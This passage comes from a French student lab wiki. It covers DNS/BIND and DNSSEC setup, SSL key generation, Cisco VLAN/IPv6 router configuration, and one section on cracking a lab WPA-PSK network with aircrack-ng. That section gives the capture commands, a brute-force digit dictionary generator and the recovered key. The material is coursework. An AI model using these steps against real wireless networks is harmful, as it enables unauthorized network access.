  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
====Mise en place serveur DNS====&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.space &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
====Certificat SSL====&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Installation de DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
===Séance 3.5 : 14/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Craquage WPA/PSK par dictionnaire====&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
=====Récupération du handshake=====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
=====Rappel montage USB=====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
=====Crack WPA/PSK=====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
===Séance 4 : 17/12/2018===&lt;br /&gt;
====Correction IPV6 routeur====&lt;br /&gt;
&lt;br /&gt;
===== Vlan 43 - XEN =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 131 - Interconnexion =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 10+N - Groupe N =====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérifications du fonctionnement =====&lt;br /&gt;
&lt;br /&gt;
====== show running-config ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
